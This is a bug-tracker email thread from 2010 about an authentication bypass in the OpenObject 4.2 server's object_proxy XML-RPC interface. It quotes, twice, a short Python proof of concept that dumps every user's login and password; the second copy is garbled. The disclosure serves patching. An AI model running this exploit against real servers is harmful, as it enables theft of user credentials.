I tried to use this and I can not replicate this bug, can you guide me
please!
2010/4/26 Eduard Carreras i Nadal <email address hidden>
> Today, 4 months after the vulnerability still there...
>
> I re-attach the exploit...
>
> ** Attachment added: "get_all_users_pass.py"
> http://launchpadlibrarian.net/45524184/get_all_users_pass.py
>
> --
> [4.2] Netsvc object_proxy bypass
> https://bugs.launchpad.net/bugs/452373
> You received this bug notification because you are subscribed to
> OpenObject.
>
> Status in OpenObject Server: Invalid
>
> Bug description:
> It's possible to call any method of object xml-rpc interface using another
> interface called object_proxy. The only requisit is that server is
> initialitzed (eg. someone do the login or tries to login).
>
> This is solved in 5.0 but not in 4.2.
> In bazaar 4.2 is tagged as mature and I can't undersant why this patch is
> not ported to this branch.
>
> I attach a simple patch that we use in our production servers which
> someones still working on 4.2 version.
>
> Proof of concept:
>
> sock = xmlrpclib.ServerProxy('http://127.0.0.1:8069/xmlrpc/object_proxy')
> ids = sock.execute('terp', 1, 'res.users', 'search', [])
> f = sock.execute('terp', 1, 'res.users', 'read', ids, ['id', 'login',
> 'password'])
> for u in f:
> print ' user: %s pass: %s' % (u['login'], u['password'])
>
>
>
I tried to use this and I can not replicate this bug, can you guide me
please!
2010/4/26 Eduard Carreras i Nadal <email address hidden>
> Today, 4 months after the vulnerability still there... users_pass. py" launchpadlibrar ian.net/ 45524184/ get_all_ users_pass. py /bugs.launchpad .net/bugs/ 452373 ServerProxy( 'http:// 127.0.0. 1:8069/ xmlrpc/ object_ proxy') 'terp', 1, 'res.users', 'search', []) 'terp', 1, 'res.users', 'read', ids, ['id', 'login',
>
> I re-attach the exploit...
>
> ** Attachment added: "get_all_
> http://
>
> --
> [4.2] Netsvc object_proxy bypass
> https:/
> You received this bug notification because you are subscribed to
> OpenObject.
>
> Status in OpenObject Server: Invalid
>
> Bug description:
> It's possible to call any method of object xml-rpc interface using another
> interface called object_proxy. The only requisit is that server is
> initialitzed (eg. someone do the login or tries to login).
>
> This is solved in 5.0 but not in 4.2.
> In bazaar 4.2 is tagged as mature and I can't undersant why this patch is
> not ported to this branch.
>
> I attach a simple patch that we use in our production servers which
> someones still working on 4.2 version.
>
> Proof of concept:
>
> sock = xmlrpclib.
> ids = sock.execute(
> f = sock.execute(
> 'password'])
> for u in f:
> print ' user: %s pass: %s' % (u['login'], u['password'])
>
>
>
--
Saludos Cordiales
Nhomar G. Hernandez M. geronimo. com.ve openerp. netquatro. com
+58-414-4110269
+58-212-6615932
+58-212-9536734 ext 124
+58-212-9512643
Web-Blog: http://
Servicios IT: http://
Linux-Counter: 467724
Correos:
<email address hidden>
<email address hidden>